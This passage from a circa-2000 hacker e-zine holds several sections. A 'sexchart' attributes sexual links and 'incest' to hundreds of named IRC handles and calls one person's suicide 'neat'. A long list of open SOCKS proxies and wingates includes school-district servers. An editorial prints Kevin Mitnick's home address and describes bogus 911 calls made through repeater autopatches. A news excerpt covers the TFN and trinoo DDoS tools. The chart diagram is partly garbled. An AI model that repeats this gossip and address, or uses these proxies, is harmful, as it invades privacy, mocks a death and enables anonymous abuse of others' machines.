04.0 The hacker sex chart 2000
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

This was to be included in the last issue but attrition was down (only
source I know of that carries it) so here it is in its glory.

*********** WARNING: Explicit content **************************************

slander & libel -- the official computer scene sexchart
"that's none of your business!"
version 9.04

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

for updates, additions, or to be put on the sexchart mailing list, mail
crank@ice.net. to receive the latest version on efnet irc, "/msg lifelike
sexchart".

a link is denoted by any sexual action between computer users that is
capable of spreading an std, from wet kissing on up.

the last .05 of revisions is listed at the bottom.

since the chart has grown so much, it's been extended in a strange way.
to preserve the 78 column width, there is now a secondary chart beneath
the first. people whose names appear between asterisks (*) in the first
chart also exist in the second.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

[sexchart v9.04: the 78-column ASCII link diagram of handles did not
survive extraction and is not reproduced here]
| onyx -- furie | | | blaise -- skippy | msk ---' simunye pandora `---|------------|----|-|------------------' ||| michelle ----|----' yt -- panther_modern ||`---------------------------------. .---|---------------. || .--------------------------- fizzgig --|-- rubella | |`----|-------------------------. | | | | | Imperia | deadgirl | | | | | | | | lethar ----------. |.-|--|---|-|---' neologic | Asmodeus | | | | || | | | `---. | | .--' | | | valeriee Mali netik -|-----|-- mayfair | Kalannar | Sinja | | | | | | | | | | | Xaotika StVitus | | | fishie -- Missa | E_D | | | | | | | | | | | outside -- emmie Frobozz | | belial --- Uadjit -- solomon -- Mottyl | | | | | | | | | | |`---. | rebrane | Murmur_gth | | | |.---------|-' Grue --|--|-- moomin13 | | | | | | | ||.--------|-----' | | `--------|------|---------|-- gothbitch! -------|-----------' Fiore --. JelloMold *bifrost* `--. | ||`---------|--------------'| | | `----- aex |`--- pahroza -- anubis MartYr | bile -- turtlgrl --------|----|------' | | | inox Miah secretboy Arkham Stipen - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - hydro311 Starr angieb am0eba -- spyder_bytes thepublic -- rage | | | Chef -- meenk ---- gweeds tigerbeck -- bifrost disorder -- kamira | | | fuz B00bz magpie pinguino -- pill maq -- apok0lyps - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - "the big loop" is over 800 people! holy crap! work for the chart. the top rankings: ---------------- #1 winner -- pinguino & gweeds -- 21 links! it's a tie! #2 winner -- meenk -- 19 links! #3 winner -- crank -- 18 links! #4 winner -- xgirl -- 15 links! #5 winner -- n0elle & sQurl -- 13 links! it's a tie! honorable mention: ----------------- 12 links: gothbitch, ophie, GoNINzo, Wayhigh, & phyzzix! 11 links: murmur, evol, lust, Mikey, & fuz! 10 links: pip, & tigerbeck! 9 links: metalchic, Kaleid, hillary, y-windows, fuz, hitchcock, demonika, & l0ra! be a winner *today*! 
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - unconfirmed links: these are links i've been told more than twice to add, but have then been told by others to remove once they're on the chart. each link stays for six months, & if no one can prove it's valid in that time, it is removed & assumed untrue. if you bore witness to one of these links or know someone who did, mail crank@ice.net with your confession! (no unconfirmed links at this time.) - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - notable gross things on the chart: this is a section for easy reference to family members on the chart. the end people are the relation as noted. if you know two people on the big loop are in the same family, mail crank@ice.net & let us rejoice in the incest! tigerbeck -- aries99 1 link: siblings spirit -- hillary -- seth -- candyrain 3 links: siblings pixy -- gweeds -- jess -- andrew -- mswicked 4 links: siblings blueeyes -- 8ball -- crank -- aoxomoxoa -- poppie -- donnie 5 links: siblings art -- seaya -- kaia -- murmur -- sonia -- plexus 5 links: siblings potter -- scat -- bF -- evol -- styx 4 links: cousins christy -- kkrazy -- kinessa -- gweeds -- LCN -- tanadept 5 links: stepsiblings - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - #2600: lashtal | empress deadguy | maverick | | | | sin ----- speck -- liquid_motion | | beastly -- c4in d_rebel kspiff -- mimes -- dieznyik -- nelli | borys -- zebby (#bodyart) LdyMuriel Erato flutterbi chexbitz `---. | .---' | Kalika -- IceHeart -------------- virago -- mre || | | | Berdiene --'| | Pyra -- Roamer ewheat | `---------. 
Serenla --' roach -- satsuki -- spinningmind kitiara -- starlord anarchy -- aphex twin soul seeker -- educated guess tempus thales -- lady in black -- midnight sorrow magnatop -- darice jandor -- alexis ryna illusionx -- thumper javaman -- nrmlgrl - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - bodyart [#bodyart/#bodypiercing/#tattoo]: ga[r]y | | xindjoo -- grrtigger -- bone-head | | FreAkBoi -- psychoslut -- timo heidikins -- pasquale grub -- gypsie tabaqui -- catbones -- sprite ministry -- SuperMia -- superdave bert37 -- chiot steppah -- creeper syx66 -- gypsy_whore - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - #coders: simon -- wolfie -- raphael (#trax) bolt -- ashli - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - #ezines: sirlance -- holly -- hardcore | rattle -- s4ra -- doommaker phairgirl -- M4D_3LF -- amanda -- unrelated -- effy -- BigDaddyBill | | pixieOpower spiff -- tl109 figglemuffinz -- creed ilsundal -- fairy_princess vanir -- darkland snarfblat -- d1d1 dimes -- bexy -- mindcrime tut -- casey pezmonkey -- cptbovine greyhawk -- crazybaby cheesus -- meowkovich catbutt -- pulse ygraine -- drool bigmike -- shana camel -- icee UberFizzGig -- kniht -- wadsworth - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - #hack: t0c -- seussy -- o0 | taner glyph -- adnama -- weaselboy -- vein -- montell | | m0rticia shamrock -- jennicide -- efpee -- imposter-dh | bellum radikahl -- jazmine -- gitm t3kg -- elfgard pluvius -- lydia panic -- plant -- erikt sl33p -- molldoll allman -- costales rhost -- sue_white serpent -- no_ana vaxbuster -- tiggie -- redragon ajrez -- luminare -- m0jo - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - #mindvox: killarney -- tomwhore -- fairosa -- kids - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - misc: MsLePew -- Beacher sangfroid -- inspektor foo -- leeny HippieEB -- Imaj 
mskathy -- strahd plutonium -- pixiedust cnelson -- vanessa Hawkerly --- MeaNKaT --- Morpheus Vega1 -- Serena DIPTY_DO -- Trish_ -- hellsnake Grace^ -- Gusto -- puckie notyou -- jennyh Skada -- icee_bin -- eriss doogie -- sarahlove kirby-wan -- cybergirl lurid -- deb -- bmbr j-dog -- a_kitten Fenchurch -- Becca captain_zap -- ms_infowar jaran -- duke chs -- princess ndex -- illusions - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - music [#punk/#ska/#sxe]: solaris -- kojak -- chelsea -- pieskin -- lady rude | kcskin -- janew | kamaskin -- kimee -- dano joojoo nes | | auralee -- konfuz -- subgurl -- danx -- starla | | kathy21 alee mutata -- skidman shellskin -- amberskin astrophil -- maggiemae skarjerk -- pancreas prick -- taxie -- jubjub - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - #seattle: nitefall bgh -- superlime -- Shill -- Lizsac fimble | | | juice -- e1mo -- shane -- aeriona -- Justnsane -- koosh -- tcb clarita -- dataangel wyclef -- NessaLee Drmc -- Jill- SisSoul -- Matt Dawgie -- Jenay jsk -- ames Liz -- jkowall kurgan -- babygrrl Mcbeth -- BeccaBoo djinn -- ruthe wankle -- carrianne hamilton -- nurit - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - #skate: kindje -- tigerkat -- huphtur -- superzan | punkgirl -- yakuza -- maryjane | caroline -- rhy cosmo cks lodias `--. | .--' outlander -- spike -- lightborn .--'|||`--. 
darkelf ||| weevil ||| tenchi --'|`-- h0ly [r] katskate -- earwax vlinder -- miesj superfly -- conchita -- nobaboon -- no_fievel p4nacea -- bakunin herculez -- nicki - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - #trax: cardiac sandman -- trissy skie -- necros | | | saxy -- vegas basehead | | | kiwidog fassassin -- discodiva gblues | squeep -- qporucpine -- ami -- dilvish higherbeing -- ms_saigon -- floss | | howler vizz mellow-d -- kisu -- snowman -- trixi | megz lowrider -- lum -- perisoft mickrip -- astrid -- draggy -- leece pandorra -- malakai ozone -- bliss animix -- pixie lummy -- daedalus frostbitten_dream -- pickl'ette -- redial - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - #twilight_zone: revneptho dtm Frizz0 Wireless `----.| .---' | h0lydirt --- nina -- zbrightmn -- halah .--'| `---. | dog3 | whistler RockShox | chilly joeN -- daysee -- evil_ed -- linnea | munchie Loverman -- Missi redbird -- reddy - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - #unix: in4mer -- devilgrl gerg -- tyger chloe -- cosmos dem -- webb callechan -- rhiannon RealScott -- Ila supertaz -- skye - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - revision history -- last updated 7-28-99 v9.04: added belial, f_fisher, Murmur_gth, bix, DJTrax, kamira, Heather, phen, montel, monachus, Schquimpy, Nex, phreaky, Sylvie, Katia, banshee, PointBlank, & RaggedyAnne. added magpie, hydro311, kamira, disorder, apok0lyps, maq, rage, & thepublic to the secondary chart. (if anyone has an alternate nick for the #gothic Murmur, please mail me. i used the nick Murmur_gth for now.) added misc gh0st group to the big loop. gweeds moves up to winner 1. meenk moves up to winner 2. gothbitch moves up to honorable mention 12. renamed Listener to alecks. renamed illuminaeti to luminare. renamed zines category to #ezines. added phairgirl -- pixieOpower -- M4D_3LF -- amanda to #ezines. 
added amanda -- unrelated -- effy -- BigDaddyBill to #ezines. added jennicide -- bellum to #hack. added luminare -- ajrez to #hack. added to misc: deb -- bmbr j-dog -- a_kitten Fenchurch -- Becca captain_zap -- ms_infowar deb -- lurid jaran -- duke chs -- princess ndex -- illusions removed one outdated "unconfirmed link". removed miasma -- six from unconfirmed. oops. removed bogus links: t -- gf -- lilfeet Quarex -- keroppi new links: fizzgig -- (solomon, Asmodeus, fishie, belial) Grue -- gothbitch -- Asmodeus gothbitch -- belial -- Uadjit METchiCK -- (f_fisher, grimmy, deadapril, supervixn) kel -- (disorder, lizzie, gh0st) corp -- gweeds -- magpie aex -- Murmur_gth eppie -- bix styx -- DJTrax meenk -- hydro311 halfman -- sumogirl disorder -- kamira -- apok0lyps -- maq -- Heather -- montel el_jefe -- (Mika, phen, Heather) daud -- monachus amos -- velcro Schquimpy -- (trilobyte, EddieV, Nex) splat -- phreaky Sylvie -- neko -- Katia shipley -- banshee thepublic -- rage hylonome -- PointBlank -- RaggedyAnne hylonome -- RaggedyAnne -- Quarex v9.03: added deadgirl, Gemni, DrMonk, AK47, monkeygrl, Miah, grlfrmars, wildcard, spectacle, kev-man, bile, chinagirl, rubella, Arkham, Uadjit, fishie, solomon, moomin13, Grue, Missa, Mottyl, Kalannar, E_D, Fiore, MartYr, & Stipen. added angieb to the secondary chart. updated number of people in the big loop. gweeds moves up to winner 2. meenk moves up to winner 3. gothbitch moves up to honorable mention 9. added miasma -- six to unconfirmed. added zines The_Sock group to the big loop. added zines AnonGirl group to the big loop. added javaman -- nrmlgrl to #2600. added satsuki -- (IceHeart, roach, spinningmind) to #2600. added doogie -- sarahlove to misc. added kirby-wan -- cybergirl to misc. added shane -- aeriona to #seattle. 
added to #trax: skie -- necros astrid -- draggy ms_saigon -- vizz snowman -- megz removed bogus links: mailart -- konfuz (mailart = nes) new links: DH -- Gemni -- DrMonk meenk -- AK47 gweeds -- angieb AIDS -- caitlin deadgirl -- Mali -- maq logicbox -- monkeygrl Fiore -- gothbitch -- Miah grlfrmars -- (mogel, wildcard, spectacle, kev-man) turtlegrl -- bile trilobyte -- chinagirl fizzgig -- rubella anubis -- Arkham swisspope -- AnonGirl pahroza -- Uadjit -- solomon -- moomin13 -- Grue Fiore -- solomon -- gothbitch -- Uadjit -- fishie -- Missa Mottyl -- (solomon, Kalannar, E_D) MartYr -- Fiore -- Stipen v9.02: added rebrane, Xaotika, valeriee, JelloMold, neologic, amos, EddieV, Roadruner, TAYL0R HAWKINS, MINNIE DRIVER, secretboy, kel, nevre, freqout, krnl, skatin, Sinja, Frobozz, & hawk. gweeds moves up to winner 2. meenk moves up to winner 3. sQurl moves up to winner 6. metalchic moves up to honorable mention 9. renamed cannianne to carrianne. added to misc: Hawkerly --- MeaNKaT --- Morpheus Vega1 -- Serena DIPTY_DO -- Trish_ -- hellsnake Grace^ -- Gusto -- puckie notyou -- jennyh Skada -- icee_bin -- eriss (special note: eriss was dumped for Skada & subsequently leapt to her death from a nineteeth story window. neat!) 
added to #zines: nico -- anjee -- meethos -- METchiCK -- The_Sock -- ^mindy^ meethos -- Alucard -- The_Sock -- kitn -- ILUVJeNNA MrJuGGaLo -- METchiCK -- facedown caitlin --- wmmr --- coffeegrl AnonGirl -- Medusa -- PrimeX -- Juliette removed bogus links: emmie -- (netik, msk, Herodotus) billn -- Tay -- retrospek mayfair -- outside Mali -- (Asmodeus, pahroza, Uhlume, Imperia) new links: emmie -- rebrane -- JelloMold Xaotika -- lethar -- valeriee mayfair -- neologic trilobyte -- amos -- EddieV -- sonia sQurl -- Roadruner Tay -- TAYL0R HAWKINS -- MINNIE DRIVER anubis -- secretboy netmask -- kel meenk -- nevre gweeds -- freqout missx -- krnl metalchic -- skatin Imperia -- Asmodeus -- Sinja turtlgrl -- pahroza -- gothbitch -- Mali -- lethar fizzgig -- msk gothbitch -- Frobozz darwin -- hawk v9.01: added tamago, atticus, lilindian, martyn, aries99, ryshask, timmerca, twichykat, soulvamp, mysl, fizzgig, lethar, anubis, & inox. added tigerbeck & bifrost to the secondary chart. updated number of people in the big loop. new "gross link": tigerbeck -- aries99 (1: siblings) gweeds moves up to winner 3. tigerbeck moves up to honorable mention 10. added FreAkBoi -- psychoslut -- timo to #bodyart. added supertaz -- skye to #unix. removed one outdated "unconfirmed link". removed bogus links: juliet -- readwerd FreAkBoi -- ga[r]y (#bodyart) Briana -- homeysan new links: seaya -- tamago _Melody_ -- atticus DrkSphere -- lilindian tigerbeck -- (aries99, martyn, ryshask, timmerca, soulvamp) tigerbeck -- (allira, twichykat, spacegirl, bifrost) gweeds -- mysl msk -- DangerJen -- Astaroth outside -- mayfair netik -- fizzgig emmie -- lethar pahroza -- anubis aex -- inox v9.00: i was going to do something special for 9.00, but there just isn't anything to do. would you people be interested in sexchart tshirts? mail crank@ice.net. note to webmasters - it's not sexchart.8 anymore - sexchart.txt. be sure to update your links. 
added NeuralizR, vlaad, pahroza, Imperia, Mali, Uhlume, StVitus, Herodotus, & Asmodeus. added am0eba, & spyder_bytes to the secondary chart. added netik & Mali sections to the big loop. added new section: #seattle. moved e1mo links to #seattle. moved koosh -- tcb to #seattle. moved clarita -- dataangel to #seattle. added chexbitz -- virago -- ewheat to #2600. added Astaroth -- DangerJen to #gothic. added plutonium -- pixiedust to misc. added cnelson -- vanessa to misc. added to #seattle: wyclef -- NessaLee Drmc -- Jill- SisSoul -- Matt Dawgie -- Jenay jsk -- ames Liz -- jkowall bgh -- superlime -- Shill -- Lizsac fimble -- koosh -- Justnsane -- aeriona -- superlime kurgan -- babygrrl Mcbeth -- BeccaBoo djinn -- ruthe wankle -- cannianne hamilton -- nurit added halah -- Wireless to #twilight_zone. removed one outdated "unconfirmed link". removed bogus links: e1mo -- chris22 (#seattle) loki -- am0eba -- sledge missx -- (sledge, erikb, ice9) Briana -- nebulizr logicbox -- skully murcurochrome -- jazmine -- deadkat (#hack) new links: am0eba -- spyder_bytes Briana -- (NeuralizR, bumble, nettwerk, homeysan, tsal) teletype -- vlaad netik -- msk -- emmie -- outside aex -- bifrost -- emmie -- netik emmie -- Herodotus bifrost -- turtlgrl Imperia -- msk Mali -- (Uhlume, Imperia, Asmodeus, StVitus, pahroza) @HWA 05.0 Peer finally arrested after over a decade of connection resetting ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From http://www.ircnews.com/ (Humour, in case you didn't know a common connection error is "connection reset by peer" caused by errors in the network and on occasion a DoS attack on your IRC connection... ;) - Ed) Peer Arrested, Charged With Resetting Connections SEATTLE, WA - An exhaustive eight month cyberhunt ended shortly before dawn on January 14th, 2000, as FBI agents and Washington State Troopers apprehended the elusive chatroom terrorist known only as Peer. 
The IRC menace was brought to justice after a decade-long connection resetting spree that plagued chatters around the globe. FBI officials said the number of reset connections numbered in the "millions". Connections being reset by peer were the number one cause of interrupted chat sessions on all major IRC networks in 1999.

Undernet ChanServ Committee member Morrissey told IRCNews.com, "What set peer apart was the element of surprise. With ping, you kinda knew you were gonna time out. You could tell. Peer totally got you out of nowhere."

Leland, another bigshot on the Undernet IRC network, praised the FBI for their work: "How many idle times must be ruined? How many cybersex sessions must be cut short before we put an end to Peer and his shinanigans?"

Peer's lawyers criticized Leland's use of the word "shinanigans". Peer's lead defence attorney responded, "Really, I think we can come up with a better term than that. We're all adults here. Besides, it's 'alleged' shinanigans."

Federal Prosecutor Sarah Evans told IRCNews.com she intends to "throw the book" at Peer. If convicted on all counts, Peer could spend up to the next three years on probation. "His ass is mine," claimed a motivated Evans. "With any luck, we'll get that judge who handled the Mitnick case."
@HWA

06.0 Updated proxies list from IRC4all
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

http://www.lightspeed.de/irc4all/

(Left column is the reverse DNS name of the address; "NotFound" means the address had no reverse DNS record when the list was built.)

Socks 4 proxies:
~~~~~~~~~~~~~~~~
NotFound  200.248.68.129
NotFound  200.36.19.225
NotFound  195.5.52.154
ch-angrignon.qc.ca  207.236.200.66
m105.clic-in.com.br  200.231.28.15
NotFound  195.42.150.129
www.quicktest.com  12.8.210.132
internet-server.ebf.com.br  200.231.27.1
wk135.dnr-inc.com  216.62.50.135
122-94.w3.com.uy  207.3.122.94
mail.theova.com  195.14.148.65
mercury.knowlbo.co.jp  210.160.144.146
igic.bas-net.by  194.85.255.49
cr216724724.cable.net.co  216.72.47.24
zakproxy.alexcomm.net  163.121.219.62
proxy.quicktest.com  12.8.210.130
NotFound  195.14.148.101
NotFound  210.237.181.226
zskom.vol.cz  212.27.207.7
tsp-proxy.tsss.com  12.2.81.50
proxy.utvlive.com  194.46.2.34
news.ukrnafta.ukrtel.net  195.5.22.196
pcse.essalud.sld.pe  200.37.132.130
dns-server1.tj.pa.gov.br  200.242.244.1
cr216724718.cable.net.co  216.72.47.18
NotFound  194.85.255.117
NotFound  195.42.150.132
NotFound  212.22.69.35
patter.lnk.telstra.net  139.130.81.160
nic-c49-067.mw.mediaone.net  24.131.49.67
NotFound  206.112.35.146
ts18.svamberk.cz  212.47.11.231
NotFound  212.68.162.183
NotFound  194.204.206.139
mars.sos.com.pl  195.117.212.4
mail.ermanco.com  12.2.82.130
www.ukrnafta.ukrtel.net  195.5.22.195
39.volgaex.ru  194.84.127.39
NotFound  194.243.99.199
www.cassvillesd.k12.wi.us  216.56.42.3
34.volgaex.ru  194.84.127.34
pc-gusev3.ccas.ru  193.232.81.47
xl2.cscd.lviv.ua  195.5.56.1
modemcable161.21-200-24.timi.mc.videotron.net  24.200.21.161
tconl9076.tconl.com  204.26.90.76
jm1.joroistenmetalli.fi  194.137.219.130
jovellanos.com  194.224.183.221
ns.ticketport.co.jp  210.160.142.82
plebiscito.synapsis.it  195.31.227.14
NotFound  194.243.99.162
NotFound  194.204.205.93
NotFound  212.205.26.80
NotFound  210.56.18.228
h0000e894998c.ne.mediaone.net  24.128.161.28
NotFound  198.162.23.185
www.sos.iqnet.cz  212.71.157.102
ns.terna.ru  212.188.26.67
NotFound  206.103.12.131
NotFound  203.116.5.58
207-246-74-54.xdsl.qx.net  207.246.74.54
adsl-63-196-81-8.dsl.sndg02.pacbell.net  63.196.81.8
glennsil.ne.mediaone.net  24.128.160.74
dns.hokuto.ed.jp  210.233.0.34
210-55-191-126.ipnets.xtra.co.nz  210.55.191.126
relectronic.ozemail.com.au  203.108.38.61
sai0103.erols.com  207.96.118.243
frontier.netline.net.au  203.28.52.160
210-55-191-125.ipnets.xtra.co.nz  210.55.191.125
NotFound  212.68.162.177
216-59-41-69.usa.flashcom.net  216.59.41.69
mail.medikona.lt  195.14.162.220
NotFound  195.14.148.99
proxy1.israeloff.com  206.112.35.156
NotFound  195.14.148.98
NotFound  195.14.148.97
mail.trutnov.cz  212.27.207.8
sripenanti01-kmr.tm.net.my  202.188.62.6
c111.h202052116.is.net.tw  202.52.116.111
NotFound  195.14.148.100
nevisco.city.tvnet.hu  195.38.100.242
ipshome-gw.iwahashi.co.jp  210.164.242.146
216-59-40-227.usa.flashcom.net  216.59.40.227
NotFound  212.47.11.130
216-59-40-72.usa.flashcom.net  216.59.40.72
altona.lnk.telstra.net  139.130.80.123
burnem.lnk.telstra.net  139.130.54.178
edtn004203.hs.telusplanet.net  161.184.152.139
ns.ukrnafta.ukrtel.net  195.5.22.193
edtn002050.hs.telusplanet.net  161.184.144.18
nic-c40-143.mw.mediaone.net  24.131.40.143
gk8-206.47.23.149.kingston.net  206.47.23.149
dns.rikcad.co.jp  210.170.89.210
dsl-148-146.tstonramp.com  206.55.148.146
52-012.al.cgocable.ca  205.237.52.12
216-59-38-142.usa.flashcom.net  216.59.38.142
dns1.ctsjp.co.jp  210.172.87.146
52-061.al.cgocable.ca  205.237.52.61
edtn003590.hs.telusplanet.net  161.184.150.34
modemcable215.2-200-24.hull.mc.videotron.net  24.200.2.215

Socks 5 proxies
~~~~~~~~~~~~~~~
NotFound  195.5.52.154
NotFound  168.187.78.34
NotFound  210.56.18.228
NotFound  200.241.64.130
NotFound  206.112.35.146
NotFound  194.243.99.162
NotFound  194.243.99.199
garrison-grafixx.com  216.36.30.76
internet-server.ebf.com.br  200.231.27.1
pc-gusev3.ccas.ru  193.232.81.47
mail.clintrak.com  206.112.35.178
NotFound  195.146.97.178
ns.wings.co.jp  210.168.241.106
wk135.dnr-inc.com  216.62.50.135
ts18.svamberk.cz  212.47.11.231
jm1.joroistenmetalli.fi  194.137.219.130
morris.ocs.k12.al.us  216.77.56.74
c111.h202052116.is.net.tw  202.52.116.111
relectronic.ozemail.com.au  203.108.38.61
jovellanos.com  194.224.183.221
oms.ocs.k12.al.us  216.77.56.106
ntserver01.thomastonschools.org  209.150.52.114
port58151.btl.net  206.153.58.151
mail.medikona.lt  195.14.162.220
chester.chesterschooldistrict.com  12.6.236.250
NotFound  206.103.12.131
p5.itb.it  194.243.165.21
NotFound  194.226.183.34
nic-c49-067.mw.mediaone.net  24.131.49.67
south.ocs.k12.al.us  216.77.56.90
NotFound  195.146.98.226
cr216724718.cable.net.co  216.72.47.18
north.ocs.k12.al.us  216.77.56.66
dns.hokuto.ed.jp  210.233.0.34
linux.edu.vologda.ru  194.84.125.217
proxy.utvlive.com  194.46.2.34
ibp.santa.krs.ru  195.161.57.133
dns.rikcad.co.jp  210.170.89.210
207-246-74-54.xdsl.qx.net  207.246.74.54
jeter.ocs.k12.al.us  216.77.56.98
carver.ocs.k12.al.us  216.77.56.114
ohs.ocs.k12.al.us  216.77.56.122
wforest.ocs.k12.al.us  216.77.56.82
dns1.ctsjp.co.jp  210.172.87.146
edtn003590.hs.telusplanet.net  161.184.150.34
edtn004203.hs.telusplanet.net  161.184.152.139
165-246.tr.cgocable.ca  24.226.165.246
216-59-41-69.usa.flashcom.net  216.59.41.69

Wingates
~~~~~~~~
NotFound  210.56.18.228
NotFound  206.103.12.131
port58151.btl.net  206.153.58.151
NotFound  200.241.64.130
wk135.dnr-inc.com  216.62.50.135
cr216724718.cable.net.co  216.72.47.18
dns.hokuto.ed.jp  210.233.0.34
dns.rikcad.co.jp  210.170.89.210
altona.lnk.telstra.net  139.130.80.123
burnem.lnk.telstra.net  139.130.54.178
52-061.al.cgocable.ca  205.237.52.61
proxy.utvlive.com  194.46.2.34
207-246-74-54.xdsl.qx.net  207.246.74.54
edtn002050.hs.telusplanet.net  161.184.144.18
dns1.ctsjp.co.jp  210.172.87.146
edtn004203.hs.telusplanet.net  161.184.152.139
mars.sos.com.pl  195.117.212.4
165-246.tr.cgocable.ca  24.226.165.246

Other proxies available, check the site for more/updated lists.

@HWA

07.0 Rant: Mitnick to go wireless?
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Editorial, by Cruciphux
Jan 23rd 2000

Finally the long awaited release of ueber hacker Kevin Mitnick has arrived; he was released Friday Jan.
21st in the morning, and for the next three years he is not allowed to touch a computer or a cellular phone without the express permission of his probation officer.

Kevin holds out one hope, though: earlier in his 'career' Kevin was an avid amateur radio operator. His license recently expired and he is reportedly scrambling to obtain a new one. This raises an interesting question: will he be allowed to operate his ham equipment?

Packet Radio

For those not in the know, I and several other HWA members are also ham operators, and most of us got hooked by the prospect of a technology called "packet radio". Packet radio uses a link-layer protocol called AX.25, an amateur adaptation of the X.25 packet-switching protocol (the "A" stands for "Amateur"). We're some of the few people who have actually IRC'ed over a packet radio link to a unix server on the 2m band. Of course, that requires a computer, plus extra hardware to couple the computer to the radio gear. Since owning a computer is out of Kevin's reach at this time, let's forget packet and look at what other 'trouble' he could get into with a radio alone.

Repeater Nets and the Autopatch

The radios of choice these days among young hams are dual-band HTs (short for handy-talkie, i.e. walkie-talkie). These usually cover the 2m (144 MHz) and 70cm (440 MHz) bands. The 2m band by itself is the most common band in use, and a great deal of its activity goes through repeaters. A repeater can be compared to a cell site insomuch as it takes a weak signal (an HT generally puts out 100 mW to 4 W, much like a small cell phone) and REPEATS, i.e. re-broadcasts, it as a stronger signal on a nearby frequency, thus reaching a much greater range. With special DTMF codes it is possible to LINK repeaters and talk across the country using repeater nets. What's so great about this? Apart from the obvious ability to talk to people over long distances for little to no cost, many repeaters have the magic box known as an AUTOPATCH.
The autopatch is a computer interface at the repeater site that connects your radio signal to a TELCO line (aha!). Yes, many hams enjoy the privileges (minus the obvious privacy and anonymity) of 'cellular' or 'radio phone' usage for minimal cost. A GOOD radio is an investment of around $500, and a ham club membership (which gets you the repeater and autopatch codes) runs around $15/year; alternatively, the codes are posted in many places on the web.

Caveats / privacy

The airwaves are 'public property' and as such are regulated (for our own good, of course) by big brother: the FCC in the U.S.A., Industry Canada (formerly the DOC) in Canada. When you pass your licensing test (a written test of minimal proficiency in electronics and general radio theory) you are assigned a unique CALL SIGN (in some places you can request a custom/vanity sequence, but you will be allocated a random unused call if your request is already taken). Since the airwaves are public property, so are the records of the users licensed to broadcast on them. Several online databases exist, or can be bought cheaply on CDROM, with search features such as search by name, call, address, partial matches, etc. In this case a simple search on the QRZ website (http://www.qrz.com/) in the OLD database for "Kevin Mitnick" returns several possible matches, among them the correct one, listed below.

--------------------------------------------------------------------------
Callbook Data for N6NHG

The following information is taken from the March 1993 QRZ Ham Radio Callsign Database. This is not the current information for this callsign. Click on the underlined callsign to see the latest information for this record.
Callsign:    N6NHG
Class:       General
Name:        KEVIN D MITNICK
Effective:   12 Dec 1989
Expires:     12 Dec 1999
Address:     14744 LEADWELL ST
City/State:  VAN NUYS CA 91405
--------------------------------------------------------------------------

We can safely assume this is the right record: the initials (KDM) match, the location matches, and the expiry date of 12/12/99 lines up with the license having recently expired.

Shenanigans

How does Kevin fit into all this? Well, as you can see, it is possible to interface the radio with computer equipment and also to get onto outside phone lines using ham radio. A recurring problem in these parts was pirate operators making bogus 911 calls through the local CN Tower repeater's autopatch (then public or 'open'; it now requires an access code and a subaudible PL tone). That actually closed down the repeater site for some time and generated an unknown amount of harassing traffic for the 911 operators fielding the bogus calls.

The pirate is not totally safe, however. Much as Kevin was apprehended by Tsutomu through lax use of his cellphone and some radio direction finding (RDF) gear, the 2m pirate can be tracked through RDF triangulation. Several grass-roots groups do nothing but track down pirate signals, or, for sport, randomly placed signals, in what is known as the 'Fox Hunt'. But this requires manpower and the willingness to get out there and help do some tracking.

Epilogue

I truly hope Kevin is allowed to get back into one of his lifetime loves, but he may find there are too many caveats with the new features and computer integration in repeater systems: mailboxes are commonplace on repeaters, and so are email gateways, so it is conceivable that one could inadvertently get into trouble in the grey areas of the technology....

Meanwhile, all the best to Kevin and his family, and hopefully you learned a little bit about amateur radio's offerings along the way. Peace out.

Cruciphux
cruciphux@dok.org
Editor HWA.hax0r.news newsletter.
http://welcome.to/HWA.hax0r.news/

Further reading:

http://www.arrl.org - The main site of the American Radio Relay League
http://www.qrz.com/ - If you know the callsign of the operator his docs are published publicly in a database which can be searched online here. Also contains other info and links.
http://www.freekevin.com/ - You know, like more info than you need on KDM.

@HWA

08.0 Distributed Attacks on the rise. TFN and Trinoo.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

CMP Techweb : http://www.techweb.com/wire/story/TWB19991130S0010

Intruders Get Under A Network's Skin
(11/30/99, 5:40 p.m. ET)
By Rutrell Yasin, InternetWeek

A rise in rogue distributed denial of service tools being installed on networks by intruders has prompted the Computer Emergency Response Team (CERT) Coordination Center to help companies thwart the large coordinated packet flooding attacks.

CERT, a watchguard organization, has issued an advisory on two tools--trinoo and Tribe Flood Network (TFN)--after receiving reports from organizations affected by the tools. The tools "appear to be undergoing active development, testing, and deployment on the Internet," according to a CERT incident note.

So far, the tools have been installed on thousands of servers or workstations in about 100 enterprise sites, said Kevin Houle, CERT's incident response team leader.

While the type of packet flooding attacks the tools generate are not new, the scope of the attacks can have a devastating impact on an enterprise network, industry experts and IT managers agreed.

Both trinoo and TFN enable an intruder to launch coordinated attacks from many sources against one or more targets. In essence, the tools use bandwidth from multiple systems on diverse networks to generate potent attacks. The tools "can generate very large denial of service attacks that consume as much as one gigabyte of data per second," said Houle.
